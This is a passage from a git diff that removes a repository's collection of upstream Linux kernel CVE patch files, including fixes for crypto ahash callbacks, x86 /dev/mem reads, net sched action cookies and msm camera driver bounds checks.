compat_ulong_t, len, - compat_ulong_t, mode, compat_ulong_t __user *, nmask, - compat_ulong_t, maxnode, compat_ulong_t, flags) - { -- long err = 0; - unsigned long __user *nm = NULL; - unsigned long nr_bits, alloc_size; - nodemask_t bm; -@@ -1562,14 +1559,13 @@ COMPAT_SYSCALL_DEFINE6(mbind, compat_ulong_t, start, compat_ulong_t, len, - alloc_size = ALIGN(nr_bits, BITS_PER_LONG) / 8; - - if (nmask) { -- err 
= compat_get_bitmap(nodes_addr(bm), nmask, nr_bits); -+ if (compat_get_bitmap(nodes_addr(bm), nmask, nr_bits)) -+ return -EFAULT; - nm = compat_alloc_user_space(alloc_size); -- err |= copy_to_user(nm, nodes_addr(bm), alloc_size); -+ if (copy_to_user(nm, nodes_addr(bm), alloc_size)) -+ return -EFAULT; - } - -- if (err) -- return -EFAULT; -- - return sys_mbind(start, len, mode, nm, nr_bits+1, flags); - } - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-7618/^4.10/0002.patch b/Patches/Linux_CVEs/CVE-2017-7618/^4.10/0002.patch deleted file mode 100644 index a384a909..00000000 --- a/Patches/Linux_CVEs/CVE-2017-7618/^4.10/0002.patch +++ /dev/null 
@@ -1,234 +0,0 @@
-From c2798145e731005fa1e6ee2a489940c1dd8f03e4 Mon Sep 17 00:00:00 2001
-From: Herbert Xu
-Date: Mon, 10 Apr 2017 17:27:57 +0800
-Subject: crypto: ahash - Fix EINPROGRESS notification callback
-
-commit ef0579b64e93188710d48667cb5e014926af9f1b upstream.
-
-The ahash API modifies the request's callback function in order
-to clean up after itself in some corner cases (unaligned final
-and missing finup).
-
-When the request is complete ahash will restore the original
-callback and everything is fine. However, when the request gets
-an EBUSY on a full queue, an EINPROGRESS callback is made while
-the request is still ongoing.
-
-In this case the ahash API will incorrectly call its own callback.
-
-This patch fixes the problem by creating a temporary request
-object on the stack which is used to relay EINPROGRESS back to
-the original completion function.
-
-This patch also adds code to preserve the original flags value.
-
-Fixes: ab6bf4e5e5e4 ("crypto: hash - Fix the pointer voodoo in...")
-Reported-by: Sabrina Dubroca
-Tested-by: Sabrina Dubroca
-Signed-off-by: Herbert Xu
-Signed-off-by: Greg Kroah-Hartman
----
- crypto/ahash.c | 79 ++++++++++++++++++++++++++----------------
- include/crypto/internal/hash.h | 10 ++++++
- 2 files changed, 60 insertions(+), 29 deletions(-)
-
-diff --git a/crypto/ahash.c b/crypto/ahash.c
-index 46ab909..a11220e 100644
---- a/crypto/ahash.c
-+++ b/crypto/ahash.c
-@@ -31,6 +31,7 @@ struct ahash_request_priv {
- crypto_completion_t complete;
- void *data;
- u8 *result;
-+ u32 flags;
- void *ubuf[] CRYPTO_MINALIGN_ATTR;
- };
-
-@@ -269,6 +270,8 @@ static int ahash_save_req(struct ahash_request *req, crypto_completion_t cplt)
- priv->result = req->result;
- priv->complete = req->base.complete;
- priv->data = req->base.data;
-+ priv->flags = req->base.flags;
-+
- /*
- * WARNING: We do not backup req->priv here! The req->priv
- * is for internal use of the Crypto API and the
-@@ -283,38 +286,44 @@ static int ahash_save_req(struct ahash_request *req, crypto_completion_t cplt)
- return 0;
- }
-
--static void ahash_restore_req(struct ahash_request *req)
-+static void ahash_restore_req(struct ahash_request *req, int err)
- {
- struct ahash_request_priv *priv = req->priv;
-
-+ if (!err)
-+ memcpy(priv->result, req->result,
-+ crypto_ahash_digestsize(crypto_ahash_reqtfm(req)));
-+
- /* Restore the original crypto request. */
- req->result = priv->result;
-- req->base.complete = priv->complete;
-- req->base.data = priv->data;
-+
-+ ahash_request_set_callback(req, priv->flags,
-+ priv->complete, priv->data);
- req->priv = NULL;
-
- /* Free the req->priv.priv from the ADJUSTED request. */
- kzfree(priv);
- }
-
--static void ahash_op_unaligned_finish(struct ahash_request *req, int err)
-+static void ahash_notify_einprogress(struct ahash_request *req)
- {
- struct ahash_request_priv *priv = req->priv;
-+ struct crypto_async_request oreq;
-
-- if (err == -EINPROGRESS)
-- return;
--
-- if (!err)
-- memcpy(priv->result, req->result,
-- crypto_ahash_digestsize(crypto_ahash_reqtfm(req)));
-+ oreq.data = priv->data;
-
-- ahash_restore_req(req);
-+ priv->complete(&oreq, -EINPROGRESS);
- }
-
- static void ahash_op_unaligned_done(struct crypto_async_request *req, int err)
- {
- struct ahash_request *areq = req->data;
-
-+ if (err == -EINPROGRESS) {
-+ ahash_notify_einprogress(areq);
-+ return;
-+ }
-+
- /*
- * Restore the original request, see ahash_op_unaligned() for what
- * goes where.
-@@ -325,7 +334,7 @@ static void ahash_op_unaligned_done(struct crypto_async_request *req, int err)
- */
-
- /* First copy req->result into req->priv.result */
-- ahash_op_unaligned_finish(areq, err);
-+ ahash_restore_req(areq, err);
-
- /* Complete the ORIGINAL request. */
- areq->base.complete(&areq->base, err);
-@@ -341,7 +350,12 @@ static int ahash_op_unaligned(struct ahash_request *req,
- return err;
-
- err = op(req);
-- ahash_op_unaligned_finish(req, err);
-+ if (err == -EINPROGRESS ||
-+ (err == -EBUSY && (ahash_request_flags(req) &
-+ CRYPTO_TFM_REQ_MAY_BACKLOG)))
-+ return err;
-+
-+ ahash_restore_req(req, err);
-
- return err;
- }
-@@ -376,25 +390,14 @@ int crypto_ahash_digest(struct ahash_request *req)
- }
- EXPORT_SYMBOL_GPL(crypto_ahash_digest);
-
--static void ahash_def_finup_finish2(struct ahash_request *req, int err)
-+static void ahash_def_finup_done2(struct crypto_async_request *req, int err)
- {
-- struct ahash_request_priv *priv = req->priv;
-+ struct ahash_request *areq = req->data;
-
- if (err == -EINPROGRESS)
- return;
-
-- if (!err)
-- memcpy(priv->result, req->result,
-- crypto_ahash_digestsize(crypto_ahash_reqtfm(req)));
--
-- ahash_restore_req(req);
--}
--
--static void ahash_def_finup_done2(struct crypto_async_request *req, int err)
--{
-- struct ahash_request *areq = req->data;
--
-- ahash_def_finup_finish2(areq, err);
-+ ahash_restore_req(areq, err);
-
- areq->base.complete(&areq->base, err);
- }
-@@ -405,11 +408,15 @@ static int ahash_def_finup_finish1(struct ahash_request *req, int err)
- goto out;
-
- req->base.complete = ahash_def_finup_done2;
-- req->base.flags &= ~CRYPTO_TFM_REQ_MAY_SLEEP;
-+
- err = crypto_ahash_reqtfm(req)->final(req);
-+ if (err == -EINPROGRESS ||
-+ (err == -EBUSY && (ahash_request_flags(req) &
-+ CRYPTO_TFM_REQ_MAY_BACKLOG)))
-+ return err;
-
- out:
-- ahash_def_finup_finish2(req, err);
-+ ahash_restore_req(req, err);
- return err;
- }
-
-@@ -417,7 +424,16 @@ static void ahash_def_finup_done1(struct crypto_async_request *req, int err)
- {
- struct ahash_request *areq = req->data;
-
-+ if (err == -EINPROGRESS) {
-+ ahash_notify_einprogress(areq);
-+ return;
-+ }
-+
-+ areq->base.flags &= ~CRYPTO_TFM_REQ_MAY_SLEEP;
-+
- err = ahash_def_finup_finish1(areq, err);
-+ if (areq->priv)
-+ return;
-
- areq->base.complete(&areq->base, err);
- }
-@@ -432,6 +448,11 @@ static int ahash_def_finup(struct ahash_request *req)
- return err;
-
- err = tfm->update(req);
-+ if (err == -EINPROGRESS ||
-+ (err == -EBUSY && (ahash_request_flags(req) &
-+ CRYPTO_TFM_REQ_MAY_BACKLOG)))
-+ return err;
-+
- return ahash_def_finup_finish1(req, err);
- }
-
-diff --git a/include/crypto/internal/hash.h b/include/crypto/internal/hash.h
-index 3b4af1d..a25414c 100644
---- a/include/crypto/internal/hash.h
-+++ b/include/crypto/internal/hash.h
-@@ -173,6 +173,16 @@ static inline struct ahash_instance *ahash_alloc_instance(
- return crypto_alloc_instance2(name, alg, ahash_instance_headroom());
- }
-
-+static inline void ahash_request_complete(struct ahash_request *req, int err)
-+{
-+ req->base.complete(&req->base, err);
-+}
-+
-+static inline u32 ahash_request_flags(struct ahash_request *req)
-+{
-+ return req->base.flags;
-+}
-+
- static inline struct crypto_ahash *crypto_spawn_ahash(
- struct crypto_ahash_spawn *spawn)
- {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7889/^4.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-7889/^4.10/0001.patch
deleted file mode 100644
index d247d1fc..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7889/^4.10/0001.patch
+++ /dev/null
@@ -1,210 +0,0 @@
-From a4866aa812518ed1a37d8ea0c881dc946409de94 Mon Sep 17 00:00:00 2001
-From: Kees Cook
-Date: Wed, 5 Apr 2017 09:39:08 -0700
-Subject: mm: Tighten x86 /dev/mem with zeroing reads
-
-Under CONFIG_STRICT_DEVMEM, reading System RAM through /dev/mem is
-disallowed. However, on x86, the first 1MB was always allowed for BIOS
-and similar things, regardless of it actually being System RAM. It was
-possible for heap to end up getting allocated in low 1MB RAM, and then
-read by things like x86info or dd, which would trip hardened usercopy:
-
-usercopy: kernel memory exposure attempt detected from ffff880000090000 (dma-kmalloc-256) (4096 bytes)
-
-This changes the x86 exception for the low 1MB by reading back zeros for
-System RAM areas instead of blindly allowing them. More work is needed to
-extend this to mmap, but currently mmap doesn't go through usercopy, so
-hardened usercopy won't Oops the kernel.
-
-Reported-by: Tommi Rantala
-Tested-by: Tommi Rantala
-Signed-off-by: Kees Cook
----
- arch/x86/mm/init.c | 41 +++++++++++++++++++--------
- drivers/char/mem.c | 82 ++++++++++++++++++++++++++++++++++--------------------
- 2 files changed, 82 insertions(+), 41 deletions(-)
-
-diff --git a/arch/x86/mm/init.c b/arch/x86/mm/init.c
-index 22af912..889e761 100644
---- a/arch/x86/mm/init.c
-+++ b/arch/x86/mm/init.c
-@@ -643,21 +643,40 @@ void __init init_mem_mapping(void)
- * devmem_is_allowed() checks to see if /dev/mem access to a certain address
- * is valid. The argument is a physical page number.
- *
-- *
-- * On x86, access has to be given to the first megabyte of ram because that area
-- * contains BIOS code and data regions used by X and dosemu and similar apps.
-- * Access has to be given to non-kernel-ram areas as well, these contain the PCI
-- * mmio resources as well as potential bios/acpi data regions.
-+ * On x86, access has to be given to the first megabyte of RAM because that
-+ * area traditionally contains BIOS code and data regions used by X, dosemu,
-+ * and similar apps. Since they map the entire memory range, the whole range
-+ * must be allowed (for mapping), but any areas that would otherwise be
-+ * disallowed are flagged as being "zero filled" instead of rejected.
-+ * Access has to be given to non-kernel-ram areas as well, these contain the
-+ * PCI mmio resources as well as potential bios/acpi data regions.
- */
- int devmem_is_allowed(unsigned long pagenr)
- {
-- if (pagenr < 256)
-- return 1;
-- if (iomem_is_exclusive(pagenr << PAGE_SHIFT))
-+ if (page_is_ram(pagenr)) {
-+ /*
-+ * For disallowed memory regions in the low 1MB range,
-+ * request that the page be shown as all zeros.
-+ */
-+ if (pagenr < 256)
-+ return 2;
-+
-+ return 0;
-+ }
-+
-+ /*
-+ * This must follow RAM test, since System RAM is considered a
-+ * restricted resource under CONFIG_STRICT_IOMEM.
-+ */
-+ if (iomem_is_exclusive(pagenr << PAGE_SHIFT)) {
-+ /* Low 1MB bypasses iomem restrictions. */
-+ if (pagenr < 256)
-+ return 1;
-+
- return 0;
-- if (!page_is_ram(pagenr))
-- return 1;
-- return 0;
-+ }
-+
-+ return 1;
- }
-
- void free_init_pages(char *what, unsigned long begin, unsigned long end)
-diff --git a/drivers/char/mem.c b/drivers/char/mem.c
-index 6d9cc2d..7e4a9d1 100644
---- a/drivers/char/mem.c
-+++ b/drivers/char/mem.c
-@@ -60,6 +60,10 @@ static inline int valid_mmap_phys_addr_range(unsigned long pfn, size_t size)
- #endif
-
- #ifdef CONFIG_STRICT_DEVMEM
-+static inline int page_is_allowed(unsigned long pfn)
-+{
-+ return devmem_is_allowed(pfn);
-+}
- static inline int range_is_allowed(unsigned long pfn, unsigned long size)
- {
- u64 from = ((u64)pfn) << PAGE_SHIFT;
-@@ -75,6 +79,10 @@ static inline int range_is_allowed(unsigned long pfn, unsigned long size)
- return 1;
- }
- #else
-+static inline int page_is_allowed(unsigned long pfn)
-+{
-+ return 1;
-+}
- static inline int range_is_allowed(unsigned long pfn, unsigned long size)
- {
- return 1;
-@@ -122,23 +130,31 @@ static ssize_t read_mem(struct file *file, char __user *buf,
-
- while (count > 0) {
- unsigned long remaining;
-+ int allowed;
-
- sz = size_inside_page(p, count);
-
-- if (!range_is_allowed(p >> PAGE_SHIFT, count))
-+ allowed = page_is_allowed(p >> PAGE_SHIFT);
-+ if (!allowed)
- return -EPERM;
-+ if (allowed == 2) {
-+ /* Show zeros for restricted memory. */
-+ remaining = clear_user(buf, sz);
-+ } else {
-+ /*
-+ * On ia64 if a page has been mapped somewhere as
-+ * uncached, then it must also be accessed uncached
-+ * by the kernel or data corruption may occur.
-+ */
-+ ptr = xlate_dev_mem_ptr(p);
-+ if (!ptr)
-+ return -EFAULT;
-
-- /*
-- * On ia64 if a page has been mapped somewhere as uncached, then
-- * it must also be accessed uncached by the kernel or data
-- * corruption may occur.
-- */
-- ptr = xlate_dev_mem_ptr(p);
-- if (!ptr)
-- return -EFAULT;
-+ remaining = copy_to_user(buf, ptr, sz);
-+
-+ unxlate_dev_mem_ptr(p, ptr);
-+ }
-
-- remaining = copy_to_user(buf, ptr, sz);
-- unxlate_dev_mem_ptr(p, ptr);
- if (remaining)
- return -EFAULT;
-
-@@ -181,30 +197,36 @@ static ssize_t write_mem(struct file *file, const char __user *buf,
- #endif
-
- while (count > 0) {
-+ int allowed;
-+
- sz = size_inside_page(p, count);
-
-- if (!range_is_allowed(p >> PAGE_SHIFT, sz))
-+ allowed = page_is_allowed(p >> PAGE_SHIFT);
-+ if (!allowed)
- return -EPERM;
-
-- /*
-- * On ia64 if a page has been mapped somewhere as uncached, then
-- * it must also be accessed uncached by the kernel or data
-- * corruption may occur.
-- */
-- ptr = xlate_dev_mem_ptr(p);
-- if (!ptr) {
-- if (written)
-- break;
-- return -EFAULT;
-- }
-+ /* Skip actual writing when a page is marked as restricted. */
-+ if (allowed == 1) {
-+ /*
-+ * On ia64 if a page has been mapped somewhere as
-+ * uncached, then it must also be accessed uncached
-+ * by the kernel or data corruption may occur.
-+ */
-+ ptr = xlate_dev_mem_ptr(p);
-+ if (!ptr) {
-+ if (written)
-+ break;
-+ return -EFAULT;
-+ }
-
-- copied = copy_from_user(ptr, buf, sz);
-- unxlate_dev_mem_ptr(p, ptr);
-- if (copied) {
-- written += sz - copied;
-- if (written)
-- break;
-- return -EFAULT;
-+ copied = copy_from_user(ptr, buf, sz);
-+ unxlate_dev_mem_ptr(p, ptr);
-+ if (copied) {
-+ written += sz - copied;
-+ if (written)
-+ break;
-+ return -EFAULT;
-+ }
- }
-
- buf += sz;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7979/^4.11/0001.patch b/Patches/Linux_CVEs/CVE-2017-7979/^4.11/0001.patch
deleted file mode 100644
index ef032c7c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7979/^4.11/0001.patch
+++ /dev/null
@@ -1,130 +0,0 @@
-From e0535ce58b92d7baf0b33284a6c4f8f0338f943e Mon Sep 17 00:00:00 2001
-From: Wolfgang Bumiller
-Date: Thu, 20 Apr 2017 14:08:26 +0200
-Subject: net sched actions: allocate act cookie early
-
-Policing filters do not use the TCA_ACT_* enum and the tb[]
-nlattr array in tcf_action_init_1() doesn't get filled for
-them so we should not try to look for a TCA_ACT_COOKIE
-attribute in the then uninitialized array.
-The error handling in cookie allocation then calls
-tcf_hash_release() leading to invalid memory access later
-on.
-Additionally, if cookie allocation fails after an already
-existing non-policing filter has successfully been changed,
-tcf_action_release() should not be called, also we would
-have to roll back the changes in the error handling, so
-instead we now allocate the cookie early and assign it on
-success at the end.
-
-CVE-2017-7979
-Fixes: 1045ba77a596 ("net sched actions: Add support for user cookies")
-Signed-off-by: Wolfgang Bumiller
-Acked-by: Jamal Hadi Salim
-Signed-off-by: David S. Miller
----
- net/sched/act_api.c | 55 +++++++++++++++++++++++++++++++----------------------
- 1 file changed, 32 insertions(+), 23 deletions(-)
-
-diff --git a/net/sched/act_api.c b/net/sched/act_api.c
-index b70aa57..e05b924 100644
---- a/net/sched/act_api.c
-+++ b/net/sched/act_api.c
-@@ -529,20 +529,20 @@ errout:
- return err;
- }
-
--static int nla_memdup_cookie(struct tc_action *a, struct nlattr **tb)
-+static struct tc_cookie *nla_memdup_cookie(struct nlattr **tb)
- {
-- a->act_cookie = kzalloc(sizeof(*a->act_cookie), GFP_KERNEL);
-- if (!a->act_cookie)
-- return -ENOMEM;
-+ struct tc_cookie *c = kzalloc(sizeof(*c), GFP_KERNEL);
-+ if (!c)
-+ return NULL;
-
-- a->act_cookie->data = nla_memdup(tb[TCA_ACT_COOKIE], GFP_KERNEL);
-- if (!a->act_cookie->data) {
-- kfree(a->act_cookie);
-- return -ENOMEM;
-+ c->data = nla_memdup(tb[TCA_ACT_COOKIE], GFP_KERNEL);
-+ if (!c->data) {
-+ kfree(c);
-+ return NULL;
- }
-- a->act_cookie->len = nla_len(tb[TCA_ACT_COOKIE]);
-+ c->len = nla_len(tb[TCA_ACT_COOKIE]);
-
-- return 0;
-+ return c;
- }
-
- struct tc_action *tcf_action_init_1(struct net *net, struct nlattr *nla,
-@@ -551,6 +551,7 @@ struct tc_action *tcf_action_init_1(struct net *net, struct nlattr *nla,
- {
- struct tc_action *a;
- struct tc_action_ops *a_o;
-+ struct tc_cookie *cookie = NULL;
- char act_name[IFNAMSIZ];
- struct nlattr *tb[TCA_ACT_MAX + 1];
- struct nlattr *kind;
-@@ -566,6 +567,18 @@ struct tc_action *tcf_action_init_1(struct net *net, struct nlattr *nla,
- goto err_out;
- if (nla_strlcpy(act_name, kind, IFNAMSIZ) >= IFNAMSIZ)
- goto err_out;
-+ if (tb[TCA_ACT_COOKIE]) {
-+ int cklen = nla_len(tb[TCA_ACT_COOKIE]);
-+
-+ if (cklen > TC_COOKIE_MAX_SIZE)
-+ goto err_out;
-+
-+ cookie = nla_memdup_cookie(tb);
-+ if (!cookie) {
-+ err = -ENOMEM;
-+ goto err_out;
-+ }
-+ }
- } else {
- err = -EINVAL;
- if (strlcpy(act_name, name, IFNAMSIZ) >= IFNAMSIZ)
-@@ -604,20 +617,12 @@ struct tc_action *tcf_action_init_1(struct net *net, struct nlattr *nla,
- if (err < 0)
- goto err_mod;
-
-- if (tb[TCA_ACT_COOKIE]) {
-- int cklen = nla_len(tb[TCA_ACT_COOKIE]);
--
-- if (cklen > TC_COOKIE_MAX_SIZE) {
-- err = -EINVAL;
-- tcf_hash_release(a, bind);
-- goto err_mod;
-- }
--
-- if (nla_memdup_cookie(a, tb) < 0) {
-- err = -ENOMEM;
-- tcf_hash_release(a, bind);
-- goto err_mod;
-+ if (name == NULL && tb[TCA_ACT_COOKIE]) {
-+ if (a->act_cookie) {
-+ kfree(a->act_cookie->data);
-+ kfree(a->act_cookie);
- }
-+ a->act_cookie = cookie;
- }
-
- /* module count goes up only when brand new policy is created
-@@ -632,6 +637,10 @@ struct tc_action *tcf_action_init_1(struct net *net, struct nlattr *nla,
- err_mod:
- module_put(a_o->owner);
- err_out:
-+ if (cookie) {
-+ kfree(cookie->data);
-+ kfree(cookie);
-+ }
- return ERR_PTR(err);
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8233/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-8233/3.18/0001.patch
deleted file mode 100644
index 2646b4fa..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8233/3.18/0001.patch
+++ /dev/null
@@ -1,60 +0,0 @@
-From 64b7bc25e019dd07e8042e0a6ec6dc6a1dd0c385 Mon Sep 17 00:00:00 2001
-From: Pratap Nirujogi
-Date: Mon, 20 Feb 2017 17:29:33 +0530
-Subject: msm: camera: cpp: Fixing Heap overflow in output buffer
-
-Issue:
-Missing bound check when writing into the output array
-buffer, which can lead to out-of-bound heap write.
-
-Fix:
-Addding hardcoded constant 8 in the MSM_OUTPUT_BUF_CNT
-macro and size check to the place where the array is
-accessed. Returning '0' if exceeds MSM_OUTPUT_BUF_CNT.
-Caller will return -EINVAL for '0'.
-
-Change-Id: Ic03f86e3e47ece9ca7069527e741a75ad9a0f83f
-CRs-Fixed: 2004036
-Signed-off-by: Pratap Nirujogi
----
- drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c | 2 ++
- include/uapi/media/msmb_pproc.h | 3 ++-
- 2 files changed, 4 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index e35a744..19d9bbb 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -2045,6 +2045,8 @@ static int msm_cpp_check_buf_type(struct msm_buf_mngr_info *buff_mgr_info,
- /* More or equal bufs as Input buffer */
- num_output_bufs = new_frame->batch_info.batch_size;
- }
-+ if (num_output_bufs > MSM_OUTPUT_BUF_CNT)
-+ return 0;
- for (i = 0; i < num_output_bufs; i++) {
- new_frame->output_buffer_info[i].index =
- buff_mgr_info->user_buf.buf_idx[i];
-diff --git a/include/uapi/media/msmb_pproc.h b/include/uapi/media/msmb_pproc.h
-index b65669b..8f45457 100644
---- a/include/uapi/media/msmb_pproc.h
-+++ b/include/uapi/media/msmb_pproc.h
-@@ -16,6 +16,7 @@
- #define MSM_CPP_MAX_FRAME_LENGTH 4096
- #define MSM_CPP_MAX_FW_NAME_LEN 32
- #define MAX_FREQ_TBL 10
-+#define MSM_OUTPUT_BUF_CNT 8
-
- enum msm_cpp_frame_type {
- MSM_CPP_OFFLINE_FRAME,
-@@ -76,7 +77,7 @@ struct msm_cpp_frame_info_t {
- uint32_t feature_mask;
- uint8_t we_disable;
- struct msm_cpp_buffer_info_t input_buffer_info;
-- struct msm_cpp_buffer_info_t output_buffer_info[8];
-+ struct msm_cpp_buffer_info_t output_buffer_info[MSM_OUTPUT_BUF_CNT];
- struct msm_cpp_buffer_info_t duplicate_buffer_info;
- struct msm_cpp_buffer_info_t tnr_scratch_buffer_info[2];
- uint32_t reserved;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8233/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-8233/4.4/0002.patch
deleted file mode 100644
index ab69c5dc..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8233/4.4/0002.patch
+++ /dev/null
@@ -1,60 +0,0 @@
-From 8b0cb658b568e4b160a5b57fb3cef0063aff56d9 Mon Sep 17 00:00:00 2001
-From: Pratap Nirujogi
-Date: Mon, 20 Feb 2017 17:29:33 +0530
-Subject: msm: camera: cpp: Fixing Heap overflow in output buffer
-
-Issue:
-Missing bound check when writing into the output array
-buffer, which can lead to out-of-bound heap write.
-
-Fix:
-Addding hardcoded constant 8 in the MSM_OUTPUT_BUF_CNT
-macro and size check to the place where the array is
-accessed. Returning '0' if exceeds MSM_OUTPUT_BUF_CNT.
-Caller will return -EINVAL for '0'.
-
-Change-Id: Ic03f86e3e47ece9ca7069527e741a75ad9a0f83f
-CRs-Fixed: 2004036
-Signed-off-by: Pratap Nirujogi
----
- drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c | 2 ++
- include/uapi/media/msmb_pproc.h | 3 ++-
- 2 files changed, 4 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index 064c1e8..08aab07 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -2116,6 +2116,8 @@ static int msm_cpp_check_buf_type(struct msm_buf_mngr_info *buff_mgr_info,
- /* More or equal bufs as Input buffer */
- num_output_bufs = new_frame->batch_info.batch_size;
- }
-+ if (num_output_bufs > MSM_OUTPUT_BUF_CNT)
-+ return 0;
- for (i = 0; i < num_output_bufs; i++) {
- new_frame->output_buffer_info[i].index =
- buff_mgr_info->user_buf.buf_idx[i];
-diff --git a/include/uapi/media/msmb_pproc.h b/include/uapi/media/msmb_pproc.h
-index b65669b..8f45457 100644
---- a/include/uapi/media/msmb_pproc.h
-+++ b/include/uapi/media/msmb_pproc.h
-@@ -16,6 +16,7 @@
- #define MSM_CPP_MAX_FRAME_LENGTH 4096
- #define MSM_CPP_MAX_FW_NAME_LEN 32
- #define MAX_FREQ_TBL 10
-+#define MSM_OUTPUT_BUF_CNT 8
-
- enum msm_cpp_frame_type {
- MSM_CPP_OFFLINE_FRAME,
-@@ -76,7 +77,7 @@ struct msm_cpp_frame_info_t {
- uint32_t feature_mask;
- uint8_t we_disable;
- struct msm_cpp_buffer_info_t input_buffer_info;
-- struct msm_cpp_buffer_info_t output_buffer_info[8];
-+ struct msm_cpp_buffer_info_t output_buffer_info[MSM_OUTPUT_BUF_CNT];
- struct msm_cpp_buffer_info_t duplicate_buffer_info;
- struct msm_cpp_buffer_info_t tnr_scratch_buffer_info[2];
- uint32_t reserved;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8234/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8234/ANY/0001.patch
deleted file mode 100644
index d6452b3a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8234/ANY/0001.patch
+++ /dev/null
@@ -1,74 +0,0 @@
-From 6266f954a52641f550ef71653ea83c80bdd083be Mon Sep 17 00:00:00 2001
-From: Ravi Kishore Tanuku
-Date: Fri, 29 May 2015 11:49:26 +0530
-Subject: msm: camera: cci: Add out of boundary check
-
-While optimizing the cci transactions, we compare
-i2c addresses in consecutive commands using pointer
-to command.
- if (cmd->reg_addr + 1 ==(cmd+1)->reg_addr)
-Here, we need to have a out of boundary
-check to see if the pointer to that command does not
-go out of bounds.
-
-==================================================================
-BUG: KASan: out of bounds access in msm_cci_i2c_write+0x644/0xe64 at addr ffffffc01ef225d0
-Read of size 2 by task mm-qcamera-daem/6458
-=============================================================================
-BUG kmalloc-2048 (Not tainted): kasan: bad access detected
------------------------------------------------------------------------------
-
-Disabling lock debugging due to kernel taint
-INFO: Slab 0xffffffbc027bc800 objects=16 used=16 fp=0x (null) flags=0x4080
-INFO: Object 0xffffffc01ef22000 @offset=8192 fp=0x0000000000000101
-Call trace:
-[] dump_backtrace+0x0/0x174
-[] show_stack+0x10/0x1c
-[] dump_stack+0x1c/0x28
-[] print_trailer+0x138/0x14c
-[] object_err+0x38/0x4c
-[] kasan_report_error+0x21c/0x3f0
-[] kasan_report+0x68/0x78
-[] __asan_load2+0x78/0x84
-[] msm_cci_i2c_write+0x640/0xe64
-[] msm_cci_config+0xde0/0x18fc
-[] msm_cci_subdev_ioctl+0x88/0xdc
-[] msm_camera_cci_i2c_write_table+0x100/0x198
-[] msm_sensor_config32+0x684/0xe64
-[] msm_sensor_subdev_ioctl+0xf8/0x28c
-[] msm_sensor_subdev_do_ioctl+0x3c/0x48
-[] video_usercopy+0x2e8/0x4d4
-[] msm_sensor_subdev_fops_ioctl+0x10/0x1c
-[] v4l2_compat_ioctl32+0x668/0x684
-[] compat_sys_ioctl+0x13c/0x1998
-Memory state around the buggy address:
- ffffffc01ef22480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- ffffffc01ef22500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
->ffffffc01ef22580: 00 00 00 00 00 00 00 00 00 00 fc fc fc fc fc fc
- ^
- ffffffc01ef22600: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
- ffffffc01ef22680: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
-==================================================================
-
-Change-Id: Id835bf3276c91cd80c3ef59e6648a6d6792d2567
-Signed-off-by: Ravi Kishore Tanuku
----
- drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-index 86561ce..05a4c0b 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-@@ -330,7 +330,7 @@ static int32_t msm_cci_calc_cmd_len(struct cci_device *cci_dev,
- pack_max_len = size < (cci_dev->payload_size-len) ?
- size : (cci_dev->payload_size-len);
- for (i = 0; i < pack_max_len;) {
-- if (cmd->delay)
-+ if (cmd->delay || ((cmd - i2c_cmd) >= (cmd_size-1)))
- break;
- if (cmd->reg_addr + 1 ==
- (cmd+1)->reg_addr) {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8235/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8235/ANY/0001.patch
deleted file mode 100644
index 0516ba37..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8235/ANY/0001.patch
+++ /dev/null
@@ -1,118 +0,0 @@
-From 7e4424a1b5f6a6536066cca7aac2c3a23fd39f6f Mon Sep 17 00:00:00 2001
-From: Krishnankutty Kolathappilly
-Date: Wed, 16 Nov 2016 15:10:18 -0800
-Subject: msm: camera: Synchronize jpeg ISR and userspace call
-
-This will fix the race between jpeg dma ISR and userspace call.
-Without this fix jpeg dma may randomly crash due to invalid pointer
-access.
-
-Change-Id: I559ae08b9a46d5d3c35f8be509976a25faa967f9
-CRs-Fixed: 1083323
-Signed-off-by: Krishnankutty Kolathappilly
----
- .../platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_dev.c | 14 +++++++++++---
